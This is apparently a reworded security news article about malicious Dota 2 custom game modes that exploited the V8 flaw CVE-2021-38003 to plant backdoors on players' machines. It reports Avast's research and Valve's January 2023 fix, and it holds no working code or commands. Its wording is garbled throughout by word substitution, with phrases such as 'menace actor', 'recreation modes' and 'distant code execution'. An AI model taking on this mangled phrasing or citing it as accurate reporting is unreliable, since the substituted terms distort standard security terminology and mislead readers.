An unknown menace actor created malicious recreation modes for the Dota 2 multiplayer on-line battle enviornment (MOBA) online game that would have been exploited to determine backdoor entry to gamers’ techniques.
The modes exploited a high-severity flaw within the V8 JavaScript engine tracked as CVE-2021-38003 (CVSS rating: 8.8), which was exploited as a zero-day and addressed by Google in October 2021.
“Since V8 was not sandboxed in Dota, the exploit by itself allowed for distant code execution in opposition to different Dota gamers,” Avast researcher Jan Vojtěšek mentioned in a report revealed final week.
Following accountable disclosure to Valve, the sport writer shipped fixes on January 12, 2023, by upgrading the model of V8.
Game modes are primarily customized capabilities that may both increase an present title or provide fully new gameplay in a way that deviates from the usual guidelines.
While publishing a customized recreation mode to the Steam retailer features a vetting course of from Valve, the malicious recreation modes found by the antivirus vendor managed to slide by way of the cracks.
These recreation modes, which have since been taken down, are “take a look at addon plz ignore,” “Overdog no annoying heroes,” “Custom Hero Brawl,” and “Overthrow RTZ Edition X10 XP.” The menace actor can be mentioned to have revealed a fifth recreation mode named Brawl in Petah Tiqwa that didn’t pack any rogue code.
Embedded inside “take a look at addon plz ignore” is an exploit for the V8 flaw that may very well be weaponized to execute customized shellcode.
The three others, however, take a extra covert method in that the malicious code is designed to achieve out to a distant server to fetch a JavaScript payload, which can be more likely to be an exploit for CVE-2021-38003 for the reason that server is now not reachable.
In a hypothetical assault state of affairs, a participant launching one of many above recreation modes may very well be focused by the menace actor to attain distant entry to the contaminated host and deploy extra malware for additional exploitation.
It’s not instantly identified what the developer’s finish objectives have been behind creating the sport modes, however they’re unlikely to be for benign analysis functions, Avast famous.
“First, the attacker didn’t report the vulnerability to Valve (which might usually be thought-about a pleasant factor to do),” Vojtěšek mentioned. “Second, the attacker tried to cover the exploit in a stealthy backdoor.”
“Regardless, it is also attainable that the attacker did not have purely malicious intentions both, since such an attacker might arguably abuse this vulnerability with a a lot bigger affect.”